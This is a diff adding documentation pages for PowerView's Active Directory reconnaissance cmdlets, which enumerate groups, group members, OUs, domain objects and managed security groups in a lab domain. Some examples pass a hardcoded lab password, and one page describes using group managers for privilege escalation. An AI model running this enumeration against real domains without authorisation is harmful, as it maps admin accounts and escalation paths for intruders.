CN=Group,CN=Schema,CN=Configuration,DC=testlab,DC=local + +### -------------------------- EXAMPLE 5 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' 
-AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainGroup -Credential $Cred + +### -------------------------- EXAMPLE 6 -------------------------- +``` +Get-Domain | Select-Object -Expand name +``` + +testlab.local + +'DEV\Domain Admins' | Get-DomainGroup -Verbose -Properties distinguishedname +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: \[Get-DomainGroup\] Extracted domain 'dev.testlab.local' from 'DEV\Domain Admins' +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local +VERBOSE: \[Get-DomainGroup\] filter string: (&(objectCategory=group)(|(samAccountName=Domain Admins))) + +distinguishedname +----------------- +CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local + +## PARAMETERS + +### -Identity +A SamAccountName (e.g. +Group1), DistinguishedName (e.g. +CN=group1,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d202) +specifying the group to query for. +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -MemberIdentity +A SamAccountName (e.g. +Group1), DistinguishedName (e.g. +CN=group1,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d202) +specifying the user/group member to query for group membership. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: UserName + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -AdminCount +Switch. 
+Return users with '(adminCount=1)' (meaning are/were privileged). + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FindOne +Only return one result object. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: ReturnOne + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. 
+ +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Raw +Switch. +Return raw results instead of translating the fields into a custom PSObject. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.Group + +Custom PSObject with translated group property fields. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainGroupMember.md b/docs/Recon/Get-DomainGroupMember.md new file mode 100755 index 0000000..5381b2c --- /dev/null +++ b/docs/Recon/Get-DomainGroupMember.md 
@@ -0,0 +1,401 @@ +# Get-DomainGroupMember + +## SYNOPSIS +Return the members of a specific domain group. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Get-DomainGroup, Get-DomainGroupMember, Convert-ADName, Get-DomainObject, ConvertFrom-SID + +## SYNTAX + +### None (Default) +``` +Get-DomainGroupMember [-Identity] [-Domain ] [-LDAPFilter ] [-SearchBase ] + [-Server ] [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] + [-SecurityMasks ] [-Tombstone] [-Credential ] +``` + +### ManualRecurse +``` +Get-DomainGroupMember [-Identity] [-Domain ] [-Recurse] [-LDAPFilter ] + [-SearchBase ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] [-Credential ] +``` + +### RecurseUsingMatchingRule +``` +Get-DomainGroupMember [-Identity] [-Domain ] [-RecurseUsingMatchingRule] + [-LDAPFilter ] [-SearchBase ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] + [-Credential ] +``` + +## DESCRIPTION +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for the specified +group matching the criteria. +Each result is then rebound and the full user +or group object is returned. 
+ +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainGroupMember "Desktop Admins" +``` + +GroupDomain : testlab.local +GroupName : Desktop Admins +GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : Testing Group +MemberDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local +MemberObjectClass : group +MemberSID : S-1-5-21-890171859-3433809279-3366196753-1129 + +GroupDomain : testlab.local +GroupName : Desktop Admins +GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : arobbins.a +MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : S-1-5-21-890171859-3433809279-3366196753-1112 + +### -------------------------- EXAMPLE 2 -------------------------- +``` +'Desktop Admins' | Get-DomainGroupMember -Recurse +``` + +GroupDomain : testlab.local +GroupName : Desktop Admins +GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : Testing Group +MemberDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local +MemberObjectClass : group +MemberSID : S-1-5-21-890171859-3433809279-3366196753-1129 + +GroupDomain : testlab.local +GroupName : Testing Group +GroupDistinguishedName : CN=Testing Group,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : harmj0y +MemberDistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : S-1-5-21-890171859-3433809279-3366196753-1108 + +GroupDomain : testlab.local +GroupName : Desktop Admins +GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : arobbins.a +MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : 
S-1-5-21-890171859-3433809279-3366196753-1112 + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainGroupMember -Domain testlab.local -Identity 'Desktop Admins' -RecurseUingMatchingRule +``` + +GroupDomain : testlab.local +GroupName : Desktop Admins +GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : harmj0y +MemberDistinguishedName : CN=harmj0y,CN=Users,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : S-1-5-21-890171859-3433809279-3366196753-1108 + +GroupDomain : testlab.local +GroupName : Desktop Admins +GroupDistinguishedName : CN=Desktop Admins,CN=Users,DC=testlab,DC=local +MemberDomain : testlab.local +MemberName : arobbins.a +MemberDistinguishedName : CN=Andy Robbins (admin),CN=Users,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : S-1-5-21-890171859-3433809279-3366196753-1112 + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Get-DomainGroup *admin* -Properties samaccountname | Get-DomainGroupMember +``` + +### -------------------------- EXAMPLE 5 -------------------------- +``` +'CN=Enterprise Admins,CN=Users,DC=testlab,DC=local', 'Domain Admins' | Get-DomainGroupMember +``` + +### -------------------------- EXAMPLE 6 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' 
-AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainGroupMember -Credential $Cred -Identity 'Domain Admins' + +### -------------------------- EXAMPLE 7 -------------------------- +``` +Get-Domain | Select-Object -Expand name +``` + +testlab.local + +'dev\domain admins' | Get-DomainGroupMember -Verbose +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: \[Get-DomainGroupMember\] Extracted domain 'dev.testlab.local' from 'dev\domain admins' +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local +VERBOSE: \[Get-DomainGroupMember\] Get-DomainGroupMember filter string: (&(objectCategory=group)(|(samAccountName=domain admins))) +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local +VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(distinguishedname=CN=user1,CN=Users,DC=dev,DC=testlab,DC=local))) + +GroupDomain : dev.testlab.local +GroupName : Domain Admins +GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local +MemberDomain : dev.testlab.local +MemberName : user1 +MemberDistinguishedName : CN=user1,CN=Users,DC=dev,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : S-1-5-21-339048670-1233568108-4141518690-201108 + +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local +VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(distinguishedname=CN=Administrator,CN=Users,DC=dev,DC=testlab,DC=local))) +GroupDomain : dev.testlab.local +GroupName : Domain Admins +GroupDistinguishedName : CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local +MemberDomain : dev.testlab.local +MemberName : Administrator +MemberDistinguishedName : CN=Administrator,CN=Users,DC=dev,DC=testlab,DC=local +MemberObjectClass : user +MemberSID : 
S-1-5-21-339048670-1233568108-4141518690-500 + +## PARAMETERS + +### -Identity +A SamAccountName (e.g. +Group1), DistinguishedName (e.g. +CN=group1,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d202) +specifying the group to query for. +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Recurse +Switch. +If the group member is a group, recursively try to query its members as well. + +```yaml +Type: SwitchParameter +Parameter Sets: ManualRecurse +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -RecurseUsingMatchingRule +Switch. +Use LDAP_MATCHING_RULE_IN_CHAIN in the LDAP search query to recurse. +Much faster than manual recursion, but doesn't reveal cross-domain groups, +and only returns user accounts (no nested group objects themselves). + +```yaml +Type: SwitchParameter +Parameter Sets: RecurseUsingMatchingRule +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.GroupMember + +Custom PSObject with translated group member property fields. + +## NOTES + +## RELATED LINKS + +[http://www.powershellmagazine.com/2013/05/23/pstip-retrieve-group-membership-of-an-active-directory-group-recursively/](http://www.powershellmagazine.com/2013/05/23/pstip-retrieve-group-membership-of-an-active-directory-group-recursively/) + diff --git a/docs/Recon/Get-DomainManagedSecurityGroup.md b/docs/Recon/Get-DomainManagedSecurityGroup.md new file mode 100755 index 0000000..13d48a2 --- /dev/null +++ b/docs/Recon/Get-DomainManagedSecurityGroup.md 
@@ -0,0 +1,177 @@ +# Get-DomainManagedSecurityGroup + +## SYNOPSIS +Returns all security groups in the current (or target) domain that have a manager set. + +Author: Stuart Morgan (@ukstufus) \, Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObject, Get-DomainGroup, Get-DomainObjectAcl + +## SYNTAX + +``` +Get-DomainManagedSecurityGroup [[-Domain] ] [-SearchBase ] [-Server ] + [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] + [-Credential ] +``` + +## DESCRIPTION +Authority to manipulate the group membership of AD security groups and distribution groups +can be delegated to non-administrators by setting the 'managedBy' attribute. +This is typically +used to delegate management authority to distribution groups, but Windows supports security groups +being managed in the same way. + +This function searches for AD groups which have a group manager set, and determines whether that +user can manipulate group membership. +This could be a useful method of horizontal privilege +escalation, especially if the manager can manipulate the membership of a privileged group. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainManagedSecurityGroup | Export-PowerViewCSV -NoTypeInformation group-managers.csv +``` + +Store a list of all security groups with managers in group-managers.csv + +## PARAMETERS + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. 
+ +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.ManagedSecurityGroup + +A custom PSObject describing the managed security group. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainOU.md b/docs/Recon/Get-DomainOU.md new file mode 100755 index 0000000..cc1fd39 --- /dev/null +++ b/docs/Recon/Get-DomainOU.md 
@@ -0,0 +1,316 @@ +# Get-DomainOU + +## SYNOPSIS +Search for all organization units (OUs) or specific OU objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty + +## SYNTAX + +``` +Get-DomainOU [[-Identity] ] [-GPLink ] [-Domain ] [-LDAPFilter ] + [-Properties ] [-SearchBase ] [-Server ] [-SearchScope ] + [-ResultPageSize ] [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] [-FindOne] + [-Credential ] [-Raw] +``` + +## DESCRIPTION +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. +To only return specific properies, use +"-Properties whencreated,usnchanged,...". +By default, all OU objects for +the current domain are returned. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainOU +``` + +Returns the current OUs in the domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainOU *admin* -Domain testlab.local +``` + +Returns all OUs with "admin" in their name in the testlab.local domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-DomainOU -GPLink "F260B76D-55C8-46C5-BEF1-9016DD98E272" +``` + +Returns all OUs with linked to the specified group policy object. + +### -------------------------- EXAMPLE 4 -------------------------- +``` +"*admin*","*server*" | Get-DomainOU +``` + +Search for OUs with the specific names. + +### -------------------------- EXAMPLE 5 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainOU -Credential $Cred + +## PARAMETERS + +### -Identity +An OU name (e.g. +TestOU), DistinguishedName (e.g. +OU=TestOU,DC=testlab,DC=local), or +GUID (e.g. 
+8a9ba22a-8977-47e6-84ce-8c26af4e1e6a). +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -GPLink +Only return OUs with the specified GUID in their gplink property. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: GUID + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FindOne +Only return one result object. 
+ +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: ReturnOne + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Raw +Switch. +Return raw results instead of translating the fields into a custom PSObject. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.OU + +Custom PSObject with translated OU property fields. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainObject.md b/docs/Recon/Get-DomainObject.md new file mode 100755 index 0000000..f900c53 --- /dev/null +++ b/docs/Recon/Get-DomainObject.md 
@@ -0,0 +1,318 @@ +# Get-DomainObject + +## SYNOPSIS +Return all (or specified) domain objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty, Convert-ADName + +## SYNTAX + +``` +Get-DomainObject [[-Identity] ] [-Domain ] [-LDAPFilter ] [-Properties ] + [-SearchBase ] [-Server ] [-SearchScope ] [-ResultPageSize ] + [-ServerTimeLimit ] [-SecurityMasks ] [-Tombstone] [-FindOne] [-Credential ] + [-Raw] +``` + +## DESCRIPTION +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. +To only return specific properies, use +"-Properties samaccountname,usnchanged,...". +By default, all objects for +the current domain are returned. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainObject -Domain testlab.local +``` + +Return all objects for the testlab.local domain + +### -------------------------- EXAMPLE 2 -------------------------- +``` +'S-1-5-21-890171859-3433809279-3366196753-1003', 'CN=dfm,CN=Users,DC=testlab,DC=local','b6a9a2fb-bbd5-4f28-9a09-23213cea6693','dfm.a' | Get-DomainObject -Properties distinguishedname +``` + +distinguishedname +----------------- +CN=PRIMARY,OU=Domain Controllers,DC=testlab,DC=local +CN=dfm,CN=Users,DC=testlab,DC=local +OU=OU3,DC=testlab,DC=local +CN=dfm (admin),CN=Users,DC=testlab,DC=local + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' 
-AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainObject -Credential $Cred -Identity 'windows1' + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Get-Domain | Select-Object -Expand name +``` + +testlab.local + +'testlab\harmj0y','DEV\Domain Admins' | Get-DomainObject -Verbose -Properties distinguishedname +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: \[Get-DomainUser\] Extracted domain 'testlab.local' from 'testlab\harmj0y' +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(samAccountName=harmj0y))) + +distinguishedname +----------------- +CN=harmj0y,CN=Users,DC=testlab,DC=local +VERBOSE: \[Get-DomainUser\] Extracted domain 'dev.testlab.local' from 'DEV\Domain Admins' +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local +VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(samAccountName=Domain Admins))) +CN=Domain Admins,CN=Users,DC=dev,DC=testlab,DC=local + +## PARAMETERS + +### -Identity +A SamAccountName (e.g. +harmj0y), DistinguishedName (e.g. +CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False 